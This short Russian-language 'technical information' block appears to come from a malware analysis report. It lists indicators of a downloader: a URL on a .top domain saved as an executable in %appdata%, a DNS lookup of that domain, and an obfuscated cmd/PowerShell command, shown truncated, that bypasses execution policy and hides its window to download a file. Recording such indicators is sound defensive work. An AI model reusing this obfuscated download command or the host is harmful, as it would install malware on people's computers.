Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^E^rshe^ll^.EXe ^-^e^x^E^C^UT^i^oNpOL^I^c^y Bypa^S^S^ -n^opro^FIlE ^-WI^NDOWsT^YLe h^IdD^en (nE^W-^OB^J^ECt^ s^Y^S^te^M.N^et.wEB^CL^IE^Nt).^DoWnloAd^f^Il^E^('http://dp...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /C "POW^E^rshe^ll^.EXe ^-^e^x^E^C^UT^i^oNpOL^I^c^y Bypa^S^S^ -n^opro^FIlE ^-WI^NDOWsT^YLe h^IdD^en (nE^W-^OB^J^ECt^ s^Y^S^te^M.N^et.wEB^CL^IE^Nt).^DoWnloAd^f^Il^E^('http://dp...' (со скрытым окном)